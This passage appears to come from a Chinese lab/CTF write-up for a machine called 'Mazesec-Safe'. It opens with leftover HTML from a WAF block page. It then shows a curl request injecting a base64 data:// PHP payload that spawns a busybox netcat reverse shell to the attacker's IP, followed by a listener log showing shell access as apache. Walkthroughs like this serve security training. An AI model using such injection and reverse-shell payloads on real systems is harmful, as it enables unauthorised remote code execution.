0;display:flex;position:fixed;top:50%;left:50%;transform:translate(-50%,-80%)}#slg-image{flex:3;align-items:center;width:100%;padding-top:1rem;display:flex}#slg-warning{margin-left:auto;margin-right:auto}#slg-caption{text-align:center;color:var(--font-color);flex:2}#slg-text{flex:1;font-size:1.5rem;line-height:4rem;display:inline}#slg-desc{color:var(--light-font-color);font-size:.8rem;line-height:2rem}#slg-copyright{text-align:center;z-index:2000;width:100%;height:10rem;font-size:1rem;position:absolute;bottom:0}#slg-more-info{color:var(--font-color);margin-bottom:1rem;font-size:.8rem;line-height:2rem}#slg-copyright a{color:var(--light-font-color);text-decoration:none}#slg-copyright a:hover,#slg-name{color:var(--font-color)}#slg-copyright-text{margin-top:1rem}</style><script>document.documentElement.style.setProperty("--primary-color","var(--warning-color)"),document.documentElement.style.setProperty("--font-color","var(--warning-font-color)"),document.documentElement.style.setProperty("--light-font-color","var(--warning-light-font-color)");</script><script>window.product_data = {"favicon":"","name":"","name_en":"","product":"","community":"","link":"","link_en":"","self":false};</script></head><body> <div id="slg-bg"></div> <div id="slg-box"> <div id="slg-image"> <svg id="slg-warning" width="68" height="59"><g fill="var(--font-color)"><g><path d="M29.455 2.852c2.062-3.527 6.151-4.07 8.48 0 1.538 2.527 7.818 13.159 14.15 23.904l.827 1.401.412.7.823 1.396A32540 32540 0 0 1 67.03 52.144l.02.038c.26.507 2.626 5.356-1.267 6.818H3.356s-6.846-1.44-.983-9.723c2.345-3.963 8.37-14.306 14.423-24.7l1.008-1.73c4.476-7.689 8.855-15.211 11.651-19.995m4.526 40.47c-2.157 0-3.905 1.74-3.905 3.885s1.748 3.884 3.905 3.884 3.905-1.739 3.905-3.884-1.748-3.884-3.905-3.884m.042-23.955c-2.18 0-3.947 1.758-3.947 3.926V35.69c0 2.168 1.767 3.926 3.947 3.926s3.947-1.757 3.947-3.926V23.293c0-2.168-1.767-3.926-3.947-3.926"/></g></g></svg> </div> <div id="slg-caption"> <div id="slg-text"></div> <div id="slg-desc"></div> </div> </div> <div id="slg-copyright"> <div id="slg-more-info"></div> <a id="slg-link"> <div id="slg-logo" style="display:none"> <svg width="32" height="35"><g fill="var(--font-color)"><path d="M15.006.33c.602-.44 1.4-.44 2.002 0 1.985 1.444 6.911 4.473 12.901 4.631.78.035 1.418.599 1.577 1.356.922 4.754 2.605 20.848-15.452 28.35C-2.077 27.183-.43 11.07.528 6.317c.142-.757.815-1.32 1.577-1.356 5.99-.158 10.863-3.187 12.9-4.63m1.037 4.54c-.28 1.647-2.15 1.938-2.15 1.938-1.9.309-2.819-1.12-2.819-1.12.82 2.255 2.198 2.391 2.446 2.397h2.423c-.7 1.802-3.48 2.133-3.48 2.133-3.159.39-4.689-1.423-4.689-1.423q.17.357.358.66l-.008-.005a11 11 0 0 0-3.106 7.671c0 6.09 4.937 11.026 11.026 11.026 6.09 0 11.027-4.936 11.027-11.026a11 11 0 0 0-3.11-7.674q.185-.3.353-.652s-1.53 1.816-4.69 1.423c0 0-2.776-.33-3.478-2.132h2.42c.245-.006 1.627-.14 2.448-2.397 0 0-.92 1.428-2.82 1.12-.142-.025-1.882-.356-2.15-1.94"/><polygon points="15.98353 17.9879553 9.8818726 21.4510476 15.3313444 24.6578974 17.2903808 23.6211992 13.5799337 21.4510476 15.98353 20.0985396 20.3159976 22.5564681 20.3159976 23.3648458 22.2042418 24.5010295 22.2042418 21.4510476" transform="rotate(-180 16.043 21.323)"/><polygon points="15.9835296 10.9942305 9.8818722 14.4573228 15.331344 17.6641726 17.2903804 16.6274743 13.5799333 14.4573228 15.9835296 13.1048148 20.3159972 15.5627433 20.3159972 16.371121 22.2042414 17.5073047 22.2042414 14.4573228"/></g></svg> </div> <div id="slg-copyright-text"> <span id="slg-prefix"></span> <span id="slg-name"></span> <span id="slg-suffix"></span> </div> </a> </div> <script>var e;const n={unknown:{en:"Unknown Error",zh:"未知错误"},title:{en:"Protected By "+window.product_data?.name_en+" WAF",zh:window.product_data?.name+" WAF"},prefix:{en:"Security Detection Powered By",zh:"安全检测能力由"},suffix:{en:"",zh:"驱动"},name:{en:window.product_data?.name_en+" WAF",zh:window.product_data?.name+" WAF"},link:{en:window.product_data?.link_en,zh:window.product_data?.link},decrypting:{en:"Dynamic Decrypting",zh:"网页被保护，正在解密中"},failed:{en:"Decryption Failed",zh:"解密失败"},blocking:{en:"Access Forbidden",zh:"访问已被拦截"},"attack-desc":{en:"Blocked For Attack Detected",zh:"请求存在恶意行为，已被管理员拦截"},"too-fast-desc":{en:"Blocked for Access Too Fast",zh:"请求频率过高，已被管理员拦截"},"page-not-found-desc":{en:"The Page You Visited Does Not Exist",zh:"您访问的页面不存在"},"site-not-found":{en:"Website Not Found",zh:"网站不存在"},"site-not-found-desc":{en:"The Domain Name You Visited Does not Match The Server",zh:"您访问的域名与服务器不匹配"},offline:{en:"Website is Offline, Please Visit Later",zh:"网站维护中，暂时无法访问"},"gateway-error-desc":{en:"Server Response Error, Please Try Again Later",zh:"网站服务器异常，请稍后再试"},"gateway-timeout-desc":{en:"Server Response Timeout, Please Try Again Later",zh:"网站服务器响应超时，请稍后再试"},"it-works":{en:"It Works!",zh:"网站搭建成功"}};function t(e){let t=n[e];for(language in void 0===t&&(t=n.unknown),t)if(navigator.language.startsWith(language))return t[language];return t.en}function o(e,n,t){let o=document.getElementById(e);o&&(o[n]=t)}o("slg_title","innerText",t("title")),o("slg-link","href",t("link")),o("slg-prefix","innerText",t("prefix")),o("slg-name","innerText",t("name")),o("slg-suffix","innerText",t("suffix")),window.product_data?.self?document.getElementById("slg-logo").style.display="block":(document.getElementById("slg-logo").remove(),document.querySelector('link[rel="icon"]').href=window.product_data?.favicon),e=t("offline"),o("slg-text","innerText",e),o("slg-desc","innerText","");</script> </body></html><script>console.log("hashID: a8023d9");</script><!-- event_id: 33ac0e3062384da29859f20a5a5f3858 -->

而这一小段时间足够我们fuzz82端口

所以理论上是可以不走log看密码路线直接硬fuzz82端口的。

连shell也可以。

                                                
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# curl "http://192.168.56.75:82/?p=data://text/plain;base64,PD9waHAgc3lzdGVtKCdidXN5Ym94IG5jIDE5Mi4xNjguNTYuMTA0IDQ0NDQgLWUgc2gnKTsgPz4="
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./penelope.py 4444
[+] Listening for reverse shells on 0.0.0.0:4444 →  127.0.0.1 • 192.168.21.128 • 192.168.56.104 • 192.168.10.150 • 172.17.0.1 • 172.18.0.1
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from Safe-192.168.56.75-Linux-x86_64 😍 Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12 
[+] Logging to /root/.penelope/Safe~192.168.56.75_Linux_x86_64/2026_05_03-08_48_10-720.log 📜
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
Safe:/var/www/localhost/backend$ id
uid=104(apache) gid=106(apache) groups=82(www-data),106(apache),106(apache)
Safe:/var/www/localhost/backend$

雷池有点不给力啊，连上的shell居然没有直接断掉

#Mazesec

Mazesec-Safe

http://example.com/2026/05/03/Mazesec-Safe/

Author

Skyarrow

Posted on

May 3, 2026

Licensed under

一些杂感 Previous

HackTheBox-Sauna Next